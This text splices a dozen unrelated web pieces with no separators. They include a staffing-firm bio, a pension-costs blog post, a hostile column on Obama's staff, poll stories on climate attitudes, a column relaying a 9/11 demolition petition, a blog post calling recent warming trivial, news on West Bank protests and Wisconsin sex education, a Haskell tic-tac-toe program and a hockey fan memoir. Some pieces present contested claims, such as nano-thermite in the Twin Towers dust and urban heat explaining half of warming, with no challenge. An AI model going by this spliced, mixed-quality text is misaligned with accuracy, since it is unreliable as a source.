As a result , JoAnne Williams , Founder and CEO of JWilliams Staffing , owns the largest real estate staffing firm in the nation and places more candidates in full - time positions than all other real estate staffing companies combined .
JoAnne Williams is a veteran of the home building , staffing and recruitment industries .
Including 10 years as Vice President for a publicly traded homebuilder .
Her contributions are many and include : Past President and member of the Sales & Marketing Councils , instructor for segments of the National Association of Home Builders , guest lecturer for University of California , Irvine .
JoAnne was named to the 2000 Who ’s Who in Builder and Developer magazine and she was the 2004 recipient of the Southern California BJ Stewart Women ’s Achievement Award for her leadership , involvement and dedication to the building industry .
Since then , her company was named one of the “ Best Companies to Work For ” in the BIA / Orange County ’s Tribute to Excellence Spotlight Awards and by the Orange County Business Journal .
Michael Mandel , former chief economist for BusinessWeek , is now writing on his own blog .
Please consider his latest post on The Growing Gap between Govt and Private Sector Benefits .
When I was out in Kansas City at the Kauffman Foundation ’s Economic Bloggers Forum , Mish Shedlock of the blog Global Economic Trend Analysis made a persuasive case that state and local finances were completely broken because gov’t workers were overpaid compared to the private sector .
( See here for one of his posts on the subject ) .
Mish got me thinking …
So I decided to assemble some BLS data on the subject .
Not to mince words , here ’s the payoff chart , that compares the benefits of state and local workers with private sector workers .
( These figures are adjusted for inflation , and indexed to 2001I=100 ) .
In the private sector , adjusted for inflation , employer spending on retirement benefits stagnated between 2004 and 2009 .
That ’s right , just flat , even before the financial bust .
By comparison , state and local costs for retirement rose by 30 % between 2004 and 2009 , in real terms .
This can not continue .
A couple of years back , I had an experience that made me feel like a ten - year - old boy all over again , being chastised by a particularly fierce schoolmaster .
The man giving me a dressing down was an outwardly amiable fellow named Josh Bolten , then President George W Bush 's chief of staff : he was demanding an apology from me for using an anecdote he insisted he had told me in confidence ( yes , he must be a reader of the New Statesman ) .
In fact , I had checked and found that the story had already appeared elsewhere - but the ten - year - old in me felt I had no choice but to stammer out an apology .
" Apology accepted , " Bolten pronounced imperiously .
I still do n't know exactly what it was that turned me into a quaking child , but now I wonder whether I was subconsciously inti­midated by the enormous and hostile power being projected at me .
Arguably , the White House chief of staff is the second most powerful man ( no woman has ever held the office ) in the world : not only is he the man closest to the president in the Oval Office , but he also acts as his gatekeeper , deciding who can see the president and when .
Even Vice - President Joe Biden , 67 , first has to ask 50 - year - old Rahm Emanuel - President Barack Obama 's chief of staff - for an appointment .
Obama 's henchmen
I felt that same exudation of power ( but not , this time , hostility ) when I last met Emanuel , aka " Rahmbo " : as I shook hands with him , he looked me straight in the eye for what must have been at least ten seconds .
He follows another tradition of White House chiefs of staff , too .
" Rahm Emanuel probably has the dirtiest mouth in Washington , " says Eric Mas­sa , a Democratic congressman from New York who has just resigned his seat .
" He is an individual who would sell his mother to get a vote [ or ] strap his children to the front end of a locomotive . "
Massa 's brief political career in DC tells you all you need to know about Emanuel , the current atmosphere in Obama 's White House , and Washington itself .
Following a long career in the US navy , Massa was elected to the House of Representatives in 2008 , but quickly proved to be something of a maverick .
He was opposed to Obama 's health - care " reform " policies , for example , favouring a more muscular , universal health - care system .
But that was not the kind of loyalty Rahmbo demanded , and rumours that Massa had been involved in some kind of gay sex scandal swiftly started to circulate .
The result ?
Massa announced on 5 March that he would resign , citing cancer as the reason , and three days later he was no longer even a congressman .
Exit from DC one idealistic but now highly embittered Democrat .
He was an enthusiastic supporter of Obama 's supposed brotherly - love idealism just two years ago , but was none­theless politically executed by Obama 's merciless henchmen the moment he showed a hint of independence .
This sad story of a little - known New York congressman barely hit the headlines , but it is emblematic of why the Obama administration is in such a shambles .
We are witnessing a self - annihilating battle between Obama the Candidate , largely the creation of 55 - year - old David Axelrod , the cynical , dream - peddling public relations man from Chicago who is unhappily ensconced as a " senior adviser " in the White House , and Obama the President , as exemplified by the ruthless and pragmatic Emanuel , a Washington insider who also served as a senior adviser in the Clinton administration 17 years ago before becoming a congressman himself ( also representing Chi­cago , incidentally ) .
Fantasy politics
Guess which of the two is winning ?
Axelrod may yet survive and even persuade Obama to get rid of Emanuel , but he now looks and acts like a broken man : he has put on at least 20lb in the past year and makes no secret of how much he hates Washington .
Predictably , he and Emanuel profess undying love for each other .
But Axelrod has made the painful discovery that it is much more fun to run vicious electoral campaigns and conjure up visions of Elysium to a gullible media than it is to govern : fantasy politics is a lot easier than Realpolitik .
The main culprit , however , is Obama himself .
Emanuel and Axelrod are mere passing characters on the Washington stage .
Both men will be forgotten within a few years , having retired with their fortunes back to Illinois ( in just two and a half years between his stints at the White House and his election to the House , Emanuel made $ 16.2 m as a banker in Chicago , according to congressional records - do n't ask me how ) .
It was Obama , lest we forget , who eagerly allowed himself to be Axelrod 's " project " - that was the word used by the small bunch of wealthy Chicagoans who championed him .
He was the one who flashed his charming smile , peered at the autocue , and made countless soaring promises that he would never be able to fulfil .
Yet practically all the world fell for it .
I believe Obama has six months , at most , to turn things around .
History teaches us lessons , and we should not forget that the White House was in disarray after Ronald Reagan 's first year in office - yet , however unjustifiably , he went on to become one of the most popular US presidents in history .
The same could yet happen with Obama .
But with people such as Emanuel and Axelrod at his side , alas , the odds of history repeating itself are looking increasingly slim .
Sir Richard claimed his technology would be safer than that used by Nasa .
He is to be among the first space passengers , along with his daughter Holly , 28 , and son Sam , 25 .
His mother , Eve , will travel in the mothership and press the button to release the Enterprise .
Holly Branson said : " I 'm not nervous yet but when they give me a date to go I will be . "
Americans are increasingly less worried about global warming and less convinced its effects are already happening , according to an annual Gallup survey released Thursday .
Nearly half , 48 % , now believe its seriousness is exaggerated , up from 41 % in 2009 and 31 % in 1997 , when Gallup first asked the question , according to the Gallup Social Series Environment poll of 1.014 adults taken March 4 - 7 .
The poll also finds a sharp turnaround in views about what 's causing the rise in global temperatures .
Half , or 50 % , now agree with most climate scientists that human activities are the cause , down from 61 % in 2003 .
" The survey results show that the reversal in Americans ' concerns about global warming that began last year has continued in 2010 -- in some cases reverting to the levels recorded when Gallup began tracking global warming measures more than a decade ago , " Gallup says .
The poll is one of several that have shown such a shift in the last two years .
In a national poll of 1,000 likely voters released last month by Rasmussen Reports , just 35 % of respondents said they believed human activity was primarily responsible for global warming , down from 47 % in April 2008 , according to a story today by USA TODAY colleague Brian Winter .
Another survey , released earlier this month , indicates young U.S. adults -- those under age 35 -- are less concened about global warming than older generations , according to data collected by the Yale Project on Climate Change and the George Mason University Center for Climate Change Communication .
The Gallup survey discusses why attitudes are changing :
Some of the shifts in Americans ' views may reflect real - world events , including the publicity surrounding allegations of scientific fraud relating to global warming evidence , and -- perhaps in some parts of the country -- a reflection of the record - breaking snow and cold temperatures of this past winter .
Additionally , evidence from last year showed that the issue of global warming was becoming heavily partisan in nature , and it may be that the continuing doubts about global warming put forth by conservatives and others are having an effect .
It finds that a slight majority of Americans still agree that global warming is real , as 53 % say the effects of the problem have already begun or will do so in a few years .
Yet that percentage is dwindling .
The survey says the average American is now less convinced than at any time since 1997 that global warming 's effects have already begun or will begin shortly .
Until 2008 , most Gallup measures had shown increasing concern over global warming .
One factor , its newest poll says , was the work of former vice president Al Gore , including his best - selling book , An Inconvenient Truth , an Academy Award - winning documentary on the topic and his receipt of a Nobel Peace Prize in 2007 .
Readers :
Are you worried about Gallup 's findings ?
EXPLOSIVE NEWS
A lingering technical question about the Sept. 11 terrorist attacks still haunts some , and it has political implications :
How did 200,000 tons of steel disintegrate and drop in 11 seconds ?
A thousand architects and engineers want to know , and are calling on Congress to order a new investigation into the destruction of the Twin Towers and Building 7 at the World Trade Center .
“ In order to bring down this kind of mass in such a short period of time , the material must have been artificially , exploded outwards , ” says Richard Gage , a San Francisco architect and founder of the nonprofit Architects & Engineers for 9/11 Truth .
Mr. Gage , who is a member of the American Institute of Architects , managed to persuade more than 1,000 of his peers to sign a new petition requesting a formal inquiry .
“ The official Federal Emergency Management [ Agency ] and National Institute of Standards and Technology reports provide insufficient , contradictory and fraudulent accounts of the circumstances of the towers ’ destruction .
We are therefore calling for a grand jury investigation of NIST officials , ” Mr. Gage adds .
The technical issues surrounding the collapse of the towers has prompted years of debate , rebuttal and ridicule .
He is particularly disturbed by Building 7 , a 47 - story skyscraper , which was not hit by an aircraft , yet came down in “ pure free - fall acceleration . ”
He also says that more than 100 first - responders reported explosions and flashes as the towers were falling and cited evidence of “ multi - ton steel sections ejected laterally 600 ft. at 60 mph ” and the “ mid -air pulverization of 90,000 tons of concrete & metal decking . ”
There is also evidence of “ advanced explosive nano - thermitic composite material found in the World Trade Center dust , ” Mr. Gage says .
The group ’s petition at www .
ae911 truth.org is already on its way to members of Congress .
“ Government officials will be notified that ‘ Misprision of Treason , ’ U.S. Code 18 ( Sec. 2382 ) , is a serious federal offense , which requires those with evidence of treason to act , ” Mr. Gage says .
“ The implications are enormous and may have profound impact on the forthcoming Khalid Shaikh Mohammed trial . ”
Stay tuned for more in this space .
JUST SO YOU KNOW
It ’s done broke .
But given enough duct tape , Gorilla Glue and a few safety pins , we ’ll get by , perhaps .
Only 5 percent of Americans say our system of government is “ broken and cannot be fixed , ” according to a CNN / Opinion Research Corp. survey of 1,023 adults released Sunday .
The vast majority - 81 percent - say , yes , it ’s broken “ but can be fixed . ”
An optimistic 14 percent insist the government “ is n’t broken . ”
Some do n’t buy any of it , though .
“ With metronomic regularity , we go through these moments in Washington where we complain about the government being broken .
These moments have one thing in common :
The left is having trouble enacting its agenda , ” George Will told ABC ’s “ This Week ” on Sunday .
“ No one , when George W. Bush had trouble reforming Social Security , said , ‘ Oh , that ’s terrible - the government ’s broken . ’ ”
THINK ABOUT IT
“ For years , we have had information stands about the war commanders .
But the supreme commander was missing .
We need to remember the man who led our country in the war . ”
- Vladimir Makarov , chief of Moscow ’s advertising and information committee , on his decision to decorate the city with posters of Josef Stalin on May 9 , which Russia marks as the 65th anniversary of the Soviet defeat of Nazi Germany during World War II .
WHAT WORKS
Political operatives should remember that people still crave viable , timely content and friendly community that has not been sullied by technology ’s bells and whistles .
Witness conservative goddess Michelle Malkin , who has sold Hotair.com - a spirited political blog she founded in 2006 - to Salem Communications , which syndicates such talk - radio heavyweights as Bill Bennett , Hugh Hewitt and Michael Medved , among other things .
Mrs. Malkin has emerged from her experience with insight about communications in the often chaotic media / political / ideological realm .
For one thing , the “ clean , simple , user - friendly format ” has stayed the same , she says in a farewell message .
And the answer to attracting a loyal audience did not lie in a burdensome multiplatform extravaganza , either .
“ To survive , we needed to adapt , respond to market forces , and adjust the business focus to meet readers ’ revealed preferences .
Like the teleprompter reader - in - chief always says , ‘ Change is never easy . ’
I made the decision to redirect our resources away from original video reluctantly , ” Mrs. Malkin says .
“ But we looked at the metrics , we looked at the bottom line , and we listened to you .
You wanted a 24/7 , up - to - the - minute , one - stop , all - purpose conservative blog and aggregator .
You wanted an Internet water cooler to hang out with your friends - a place where you could find all the political coverage you needed , but also a place where you could get comic relief , humpbot videos , the latest ‘ Duuudes ’ and ‘ Hmmms ’ and ‘ Heart - aches , ’ and off - beat stories of the day . ”
SCHUSS UP
A limerick on a Monday ?
Aw , go ahead .
This is courtesy of longtime friend - of - Beltway and “ Politickles ” author F.R. Duplantier :
At the Winter Olympics , aghast ,
All the skiers see someone fly past ;
They ’re left out in the cold
As Obama gets gold :
No one ’s ever gone downhill so fast !
POLL DU JOUR
• 84 percent of U.S. voters say the situation in Afghanistan is important to national security .
• 47 percent believe the U.S. can win in Afghanistan .
• 30 percent say victory is not possible ; 23 percent are not sure .
• 42 percent approve of President Obama ’s handling of the war in Afghanistan .
• 79 percent of Democrats and 24 percent of Republicans agree .
• 63 percent of Republicans say “ winning the war ” is the most important goal .
• 64 percent of Democrats say “ ending the war as soon as possible ” is more important .
Source : A Rasmussen Reports survey of 1,000 likely voters conducted Feb. 19 and 20 .
• Rumbles , murmurs , rants to jharper@washingtontimes.com .
Follow her at twitter .com / harperbulletin .
Sign up for Daily Newsletters Manage Newsletters
Copyright © 2020 The Washington Times , LLC .
Click here for reprint permission .
Not to sound like a complete prude , but it does kind of amaze me that Hollywood has released a movie called Kick - Ass .
I ran a search for “ ass ” on the Internet Movie Database and while there are certainly films that have used that word as part of their title , I ca n’t think of a single movie as high profile as Kick - Ass to promote the colloquialism so prominently .
Even though I never read the original graphic novel on which the movie is based , I ’m looking forward to the movie a great deal .
The trailers make it look like colorful , sadistic fun .
How ironic that the use of Joan Jett ’s “ Bad Reputation ” for the marketing campaign is so much more effective than “ Cherry Bomb ” was for The Runaways .
Aaron Johnson plays the film ’s hero .
I have no idea who he is .
He has a fairly extensive resume , so I assume his performance will be pretty good .
Although , honestly , I ’m surprised the role did n’t go to Jesse Eisenberg .
I guess there was n’t enough sensitive longing in the character .
I ’ll be doing comics about Kick - Ass all week , so I do n’t want to say everything I have to say about the movie right now .
Right now I ’m getting ready to leave for C2E2 on Thursday , so I ’m also trying to work ahead on the comics a little bit .
Usually I run guest comics when I go to a convention .
But I thought , for once , maybe it would be a good idea to have some of my OWN work on display for people who see me at the convention and later check out the site .
First impressions and all that .
I ’m sure you understand .
So , needless to say , it ’s going to be a busy week .
If you ’re going to be in Chicago this weekend and would like to say “ Hi ” you can find me here using C2E2 ’s interactive floor map .
I will be at table WC - N in Webcomics Pavilion .
I ’m sharing the same area as Brat - halla , Shortpacked ! , Erika Moen and Lucy Knisley .
So if you see any of those artists , you ’re in the right neighborhood !
My friends Joe Dunn from Joe Loves Crappy Movies and Gordon McAlpin from Multiplex will be there as well and I ’m really looking forward to seeing them .
You should be sure to stop by their booths and say “ Hi ” as well .
That ’s it for now .
If you ’re going to be at C2E2 this weekend , let me know !
If you plan on seeing Kick - Ass this weekend , leave some comments and let ’s talk about it !
Cheers !
With photoshop CS5 , we can do some awesome stuff with the new context - aware fill tool .
Say I want to remove this tree in the foreground .
I can just select it , and now watch ...
It 's gone !
Context - aware fill has filled in the clouds and ground .
Now let 's say we 've got a hilarious comic .
Context - aware fill can finish it by filling in a funny punchline .
Take me to the hostpital !
Take you to the horse - piddle ???
It ...
The feature is still being refined .
The record - breaking deluge appears to be over , but flooding fears remain as some rivers near their crests .
Scroll through to see some scenes from our most recent bout with wet weather , and visit our flood coverage page for the latest updates .
A football field is flooded by the Sudbury River reservoir dam in Framingham .
Guest Post by Willis Eschenbach
I got to thinking about how the information about temperatures is presented .
Usually , we are shown a graph something like Fig. 1 , which shows the change in the US temperatures over the last century .
Figure 1 . Change in the US annual temperatures , 1895 - 2009 .
Data from the US Historical Climate Network ( USHCN DATA ) [ Yes , it ’s in Fahrenheit , not Celsius , but hey , it ’s US temperature , and besides I ’m doing it in solidarity with our valiant allies , all the other noble countries that are bravely fighting a desperate rear - guard action against the global metric conspiracy … Liberia and Myanmar …]
Whoa , this is obviously a huge and scary change , look at the slope of that trend line , this must be something that calls for immediate action .
So , what ’s not to like about this graph ?
What ’s wrong with it is that there is nothing in the graph that we can compare to our normal existence .
Usually , we do n’t even go so far as to think “ Well , it ’s changed about one degree Fahrenheit , call it half a degree C , that ’s not even enough to feel the difference . ”
So I decided to look for a way to present exactly the same information so that it would make more sense , a way that we can compare to our actual experience .
Fig. 2 is one way to do that .
It shows the US temperature , month by month , for each year since 1895 .
Figure 2 . US yearly temperatures by month , 1895 - 2009 .
Each line represents the record for a different year .
Red line is the temperature in 2009 .
Data source as in Fig. 1 . Photo is Vernal Falls , Yosemite
Presented in this fashion , we are reminded that the annual variation in temperature is much , much larger than the ~ 1 °F change in US temperatures over the last century .
The most recent year , 2009 , is … well … about average .
Have we seen any terrible results from the temperature differences between even the coolest and warmest years , differences which ( of course ) are much larger than the average change over the last century ?
If so , I do n’t recall those calamities , and I remember nearly half of those years …
To investigate further , Fig. 3 looks at the decadal average changes in the same way .
Figure 3 . US decadal average temperatures by month , 1900 - 2009 .
Red line is the average for the decade 2000 - 2009 .
Photo is Half Dome , Yosemite .
Most months of the year there is so little change in the decadal averages that the lines cannot be distinguished .
The warming , what there is , occurred mostly in the months of November , December , January , and February .
Slightly warmer temperatures in the winter … somehow , that does n’t strike me as anything worth breathing hard about .
My point in all of this is that the temperature changes that we are discussing ( a global rise of a bit more than half a degree C in the last century ) are trivially small .
A half degree change cannot be sensed by the human body .
In addition , the changes are generally occurring in the winter , outside of the tropics in the cooler parts of the planet , and at night .
Perhaps you see this small warming , as has often been claimed , as a huge problem that “ vastly eclipses that of terrorism ” ( the Guardian ) .
Maybe you think this is a pressing concern which is the “ defining issue of our era ” ( UN Secretary Ban Ki-Moon ) .
I do n’t .
I ’m sorry , but for me , poverty and injustice and racial prejudice and totalitarian regimes and recurring warfare and a lack of clean drinking water and torture and rampant disease and lack of education and child prostitution and a host of other problems “ vastly eclipse ” the possibility of a degree or two of warming happening at night in the winter in the extra - tropics fifty years from now .
Finally , the USHCN records are not adjusted for the urban heat island ( UHI ) effect .
UHI is the warming of the recording thermometers that occurs as the area around the temperature recording station is developed .
Increasing buildings , roads , pavement , and the cutting down of trees all tend to increase recorded temperatures .
Various authors ( e.g. McKitrick , Spencer , Jones ) have shown that UHI likely explains something on the order of half of the recorded temperature rise .
So even the small temperature rise shown above is probably shown somewhere about twice as large as it actually is …
My conclusion ?
Move along , folks , nothing to see here …
[ UPDATE – Steven Goddard points out below that the USHCN does in fact include a UHI adjustment in their data .
The adjustment is detailed here .
I do n’t agree with the adjustment , because inter alia they claim that the UHI reduces the maximum temperatures in cities .
This is contrary to my personal experience and to many studies that find it is hotter in the cities during the daytime as well as at night .
But they do make an adjustment . ]
Share this : Print
Email
Twitter
Facebook
Pinterest
LinkedIn
Reddit
Like this : Like Loading ...
Jerusalem ( CNN ) --
In a bid to end what it calls illegal riots , the Israeli military will prohibit outsider access to areas in two occupied West Bank villages one day a week , according to a statement explaining the move .
" Every week , violent , illegal riots take place in the area of Nil'in and Bil'in , during the course of which members of the security forces are wounded and heavy damage is caused to the security fence and to public property , " the Israeli military statement read .
" In an effort to prevent the inciters of these riots from reaching the area in which the riots take place , three weeks ago , OC Central Command Maj .
Gen .
Avi Mizrahi signed an order designating the area between the fence and the villages of Nil'in and Bil'in as a closed military zone . "
Word of the Israeli military order became public Monday .
For the past five years the two Palestinian towns have been home to weekly Friday protests opposing Israel 's separation barrier , the over - 700 - kilometer stretch of concrete wall and fence that separates Israel from the West Bank .
The demonstrations have become a weekly ritual and the center of a nascent non-violent Palestinian resistance movement , which attract an assortment of Palestinians , Israelis and international activists .
However , the demonstrations often degenerate into clashes between Israeli military personnel and stone - throwing youths .
The protest sites will be closed between the hours of 8 a.m. and 8 p.m. every Friday for the next six months , but the closure does not apply to residents of the villages .
The Palestinian Authority Cabinet issued a statement saying it " condemned the repressive actions by the occupation forces against peaceful demonstrations , as well as the declaration of Bil'in and Nil'in as closed military areas every Friday for six months . "
The cabinet " stressed the right of the Palestinian people , according to international laws , to defy occupation measures , settlement activities , and the building of the wall . "
The move comes after months of increased Israeli military activity in the form of night raids and arrests in the villages .
Residents and protest organizers also have decried the latest Israeli military action , saying in a news release that it is part of a " persecution campaign against Palestinian activists in an attempt to suppress the rising tide of West Bank popular resistance to the occupation . "
Speaking to CNN last month , Peter Lerner , a spokesman for the Israeli military , acknowledged Israeli army activity in the towns and said Israel has the responsibility to deal those who were leading the protests .
" If those people who are organizing it from even behind the scenes , they can not be above the law , and that 's what we 're dealing with . "
Gaby Lasky , a lawyer representing village residents , said the military order is illegal and argued that " closed military zone orders are not meant to deal with demonstrations , which are clearly in the civic rather than the military realm . "
According to the Palestinian activist group Popular Struggle , six protesters have been killed in the demonstrations since 2008 .
The Israeli military says more than a hundred of its soldiers have been wounded .
A district attorney in Juneau County , Wisconsin , warned teachers in a memo sent to schools that if they teach the new sexual education curriculum mandated under state law , they could be arrested for contributing to the delinquency of a child .
Because the law requires teachers to instruct children not only about contraceptives but about how to use them , Juneau County District Attorney Scott Southworth said , schools are forced to encourage students to " engage in sexual behavior , whether as a victim or an offender . "
And since minors can't legally have sex in Wisconsin , teachers would essentially be endorsing the behavior and could be held liable , Southworth said in the letter .
" It is akin to teaching children about alcohol use , then instructing them on how to make mixed alcoholic drinks , " he wrote .
In his letter , Southworth said the law would convert sex education classes " into a radical program that sexualizes our children as early as kindergarten .
This , in turn , will lead to more child sexual assaults . "
Southworth sent the letter to five school districts and said they should drop all sex education curriculum until the law could be changed .
The law does n't force any schools to teach the sex education classes , but it sets out strict guidelines on what should be taught in the schools that choose to do so .
The law passed narrowly in the legislature and was the topic of a fierce battle between Republicans and Democrats : No Republicans voted for it , and it was signed by a Democratic governor .
Those who support the law hail it as a chance to keep down the rate of STDs and teen pregnancies and to properly educate students , but opponents say that rather than giving children all the information necessary to have sex , they should focus on a curriculum of abstinence .
Rep. Kelda Helen Roys , a Democrat , told the Wisconsin State Journal that she believes there 's no problem with the law .
She said Southworth , a Republican , is a " zealot " who wrote the letter to try to scare people out of teaching the sexual education classes .
" Using condoms is n't a crime for anyone , " Roys told the Milwaukee Journal - Sentinel .
" This guy is not a credible legal source on this matter , I 'm sorry to say .
His purpose is to intimidate and create enough panic in the minds of school administrators that they 'll turn their backs on young people and their families . "
In his letter , Southworth argued that it is a crime and that he 's just trying to help schools be aware of the legal danger they could be putting themselves in .
" The teacher could be charged with the crime even if the child does not actually engage in the criminal behavior [ of having sex as a minor ] , " Southworth wrote .
Both the State Journal and the Journal - Sentinel spoke with school administrators who said they were seeking legal advice on the matter .
Haskell is seriously packed with modern , interesting , expressive goodies .
But I have a message for the Haskell community : stop trying to “ simplify ” monads .
Really , just stop .
I have yet to see an “ explanation ” of monads that does not add to the confusion and fear a novice might feel at approaching the language .
You do n’t need to know what a monad is in order to use the language effectively .
Talking about them to a beginner is about as useful as explaining loop unrolling and keyhole optimization to a beginning C programmer .
Later , yes , it ’s helpful .
But it ’s too much information at the start .
A beginner just needs to know that if you want to use code that does IO , it has to go inside a do , and if you want to pull out values and use them elsewhere , you need the <- operator .
It took me three nights of working on this one to learn that one , because the Gentle Introduction relegated I/O to chapter 7 .
On that note , you ’ve got to stop treating I/O in general as a red - headed stepchild .
I realize that isolating side effects is one of the raisons d’être for Haskell in the first place , but if you hope to win converts from the programming world at large ( and I really hope you do ) then you ’ve got to understand that most of us mere mortals want our programs to do something , and that means input / output .
I understand , or at least I think I do , that you want to instill good habits from the start and minimize time spend in the IO monad , but honestly , the language is pretty good at doing that already .
You ’ve got to go and talk to people where they already are before you can lead them somewhere else .
Once peple get used to IO and Maybe and whatever other monads are out there , then you can introduce the concept because there ’s somewhere for it to land .
I remember taking CS theory in college , and talking with one of the TFs who I happened to know socially .
He is an extremely bright guy , and as is sometimes common with bright guys , can have trouble explaining a concept to someone who does n’t get it themselves right away .
I made plea for more concrete examples to go with the theoretical explanations in the class , and his response was , “ Well , we assume that you , the smart [ name of school ] students , can come up with the examples yourselves . ”
This is exactly wrong for many many people out there , including a lot of the folks who are attracted to coding in the first place .
Some folks work well top - down — get the overarching concepts and then fill in the details themselves .
But some people learn the other way around — experience the details , and then build up the framework from there .
My impression is that the Haskell community is filled with the former type of learner .
But it ’s a great language , even for the more experiential / practical and less theoretical , and I hate to see it shunned as too scary .
Ranting aside , I really enjoyed writing this .
For those of you who have n’t tried it yet , I highly recommend it .
It will make you smarter .
I stumbled on places where it differs from OCaml , and I got stuck on IO for a while , but I ’m glad I persevered .
This was written against GHC 6.10.4 .
import Data .
List ( intersperse ) import System .IO ( stdout , hFlush ) import System .
Exit ( exitSuccess ) -- --
Users -- data User = X | O deriving ( Show , Eq ) otherUser X = O otherUser O = X -- -- Squares -- data Square = Move User | Empty Int deriving ( Eq ) instance Show Square where show ( Move x ) = " " ++ show x ++ " " show ( Empty x ) = " ( " ++ show x ++ " ) " filled ( Move _ ) = True filled _ = False -- -- Boards -- data Board = Board [ [ Square ] ] deriving ( Eq ) instance Show Board where show ( Board ls ) = "
" ++ concat ( intersperse "---+---+---
" $ map showLine ls ) ++ "
" where showLine xs = concat ( intersperse " | " $ map show xs ) ++ "
" full ( Board squares ) = all filled ( concat squares ) -- --
Results -- data Result = Continue User Board | Win User Board | Draw Board instance Show Result where show ( Continue user board ) = show board ++
" Select a square , " ++ show user ++ " : " show ( Win user board ) = show board ++ show user ++ " Wins !
" show ( Draw board ) = show board ++
" It 's a Draw !
" -- -- Initial Board -- startingBoard :: Board starting Board = Board [ [ Empty 1 , Empty 2 , Empty 3 ] , [ Empty 4 , Empty 5 , Empty 6 ] , [ Empty 7 , Empty 8 , Empty 9 ] ] matchSquare :: User -> Int -> Square ->
Square matchSquare user position ( Empty x ) | x == position =
Move user matchSquare _ _ square = square --
This evaluates the board and determines the result of the current user 's action outcome :: User -> Board ->
Result outcome user board = case board of ( Board [ [ a , _ , _ ] , [ _ , b , _ ] , [ _ , _ , c ] ] ) | eq a b c ->
Win user board ( Board [ [ _ , _ , a ] , [ _ , b , _ ] , [ c , _ , _ ] ] ) | eq a b c ->
Win user board ( Board [ [ a , b , c ] , [ _ , _ , _ ] , [ _ , _ , _ ] ] ) | eq a b c ->
Win user board ( Board [ [ _ , _ , _ ] , [ a , b , c ] , [ _ , _ , _ ] ] ) | eq a b c ->
Win user board ( Board [ [ _ , _ , _ ] , [ _ , _ , _ ] , [ a , b , c ] ] ) | eq a b c ->
Win user board ( Board [ [ a , _ , _ ] , [ b , _ , _ ] , [ c , _ , _ ] ] ) | eq a b c ->
Win user board ( Board [ [ _ , a , _ ] , [ _ , b , _ ] , [ _ , c , _ ] ] ) | eq a b c ->
Win user board ( Board [ [ _ , _ , a ] , [ _ , _ , b ] , [ _ , _ , c ] ] ) | eq a b c ->
Win user board _ | full board ->
Draw board | otherwise -> Continue ( otherUser user ) board where eq a b c = a == b && b == c move :: User ->
Int -> Board ->
Result move user pos board = result user pos board ( place user pos board ) where place user pos ( Board lines ) = Board $ map ( placeInLine user pos ) lines placeInLine user pos = map $ matchSquare user pos result user pos orig board | orig == board =
Continue user orig | otherwise = outcome user board main :: IO ( ) main = loop ( Continue X starting Board ) where loop result = do putStr $ show result hFlush stdout case result of Win user board -> exitSuccess Draw board -> exitSuccess Continue user board -> getInput user board getInput user board = do pos <- readLn :: IO
Int loop ( move user pos board )
In the thread of Carnie 's post last week , Brad brought up the idea that everyone on the site should post their stories of how they became fans , even if they were n't as purely awesome as hers - which mine surely is not , but still .
No one else has posted theirs yet ( that had n't already ) , so I thought I 'd go first .
WARNING : It 's kind of long - deal , bitches .
Like I 'd imagine many of you guys , my sports fandom was kindled by my father .
Unfortunately , I have grown farther and farther from my dad in the 8 years since he and my mother split up ( though mostly through the 7 that he 's been re-married ) , which is especially sad when you consider that my mother was the one with the 9 - 5 job in our household while he was a stay - at - home dad for me and my sister with the occasional midnight job in shipping .
But I still remember most of the good times growing up , doing community theatre with him , playing N64 and watching Dragon Ball Z when I got home from school , and of course , playing and talking about sports .
Maybe Mike Keenan Did Something Right ?
Never mind - fuck that guy .
However , while I 've lived in the St. Louis area most of my life , I was born in Dallas , where my dad was born and raised LONG before the North Stars migrated south .
So needless to say , hockey was n't on the radar too much , especially compared to football , which I played and was pretty much obsessed with for a good four - five years .
So the first time Blues hockey came into my life was when the Blues traded for Wayne Gretzky , who - even though I was only 7 and knew nothing about hockey - was one of those names that I knew were famous , but did n't really know why ( like Madonna or Princess Di ) .
I remember watching his first game on TV , and the seeds were sewn .
Everything about the game was fast and unlike anything I had seen much of before .
Also that night , my dad told me about this guy who had been a great hockey player for the Blues for a number of years and was kind of a big deal ... perhaps you 've heard of him ?
I think his name was Brent Hell or something ?
But that was pretty much it for me and hockey for a few years - I tried to follow the Blues in the postseason that year , but was n't allowed to stay up late enough to watch most of the games .
Then a few years later I went to my first Blues game late in the 2000 season .
I went with a group from my school spear headed by our two PE teachers , and my dad came along .
I do n't remember who we played or if we won , but I do remember the pleasant chill in the arena , the goal horns and organ playing , and especially me and my friends obnoxiously yelling " I WANNA DRIVE THE ZAMBONI !!! " during the intermissions .
On the way home , my father and I rode with the two PE teachers , who were listening to a sports show talking about the upcoming playoffs .
One of the talking heads mentioned how the big favorite for The Cup was the Dallas Stars , to which PE teacher # 2 took offense .
His reasoning : " I understand why they'd be the favorites , being defending Cup champions and all , but the Blues should be favored since they 've been the best team in the league all year ! "
This told me two things my Rams - Super Bowl - saturated brain did n't know at the time : 1 ) the team from my birthplace were defending champs , and 2 ) the Blues were actually pretty damn good !
Between the game and that knowledge , I decided I HAD to follow the Blues in the playoffs that year !
The Never - Ending Story Games : The 2000 Playoffs
Unfortunately , we all know how that turned out for the Blues .
I remember watching the first period of Game 7 with my parents , being told that I had to go to sleep at first intermission .
After Owen Nolan " scored " his fluke goal at the end of the first , I begged to stay up for the rest of the game , to no avail .
To this day , I still say if I had stayed up we may have come back !
Having been unsatisfied with the end of the Blues season , I still had an itch to watch the playoffs .
Being from Dallas , I easily picked up the Stars as my back - up team , but I watched whoever was on , especially the overtime games - that was probably THE year to be a fan of multi-OTs .
I remember catching on towards the end of the 5 OT game between the Penguins and Flyers , though I do n't remember off the top of my head who won that night .
Then it got to the finals - Stars and Devils .
By the time they got there , I had moved from Bridgeton , MO to Edwardsville , IL , so we were still adjusting to our new house , but since it was summer , I 'd stay up as late as I needed to catch the games , which that year meant pretty late .
I know a lot of people complain about The Trap and how boring Devils games are , but I sat there by myself in the basement glued to the TV for hours , afraid that even my slightest movement would be death for my adopted team .
Around the fourthor fifth intermission I 'd move upstairs to the living room to watch the next OT with my dad , who was usually up late watching Hogan 's Heroes or Howard Stern or whatever .
Even though I could n't get enough of the sport , I was still rather iffy on all the rules - I remember one night my dad and I tried to figure out what exactly offsides was .
Eventually , Jason Arnott scored in Game 6 , and while my father and I were disappointed , I remember all the ceremony , pageantry , and pure , unadulterated joy throughout the Cup presentation .
I did n't like who was doing the raising , but I loved everything else .
I knew that I wanted to be there one day - preferably with the Blue Note underneath The Cup .
CAAAAAARRRRRRRR !!!!!!
I started really getting into street hockey with a few friends down the street - we 'd usually play as much as four - five times a week .
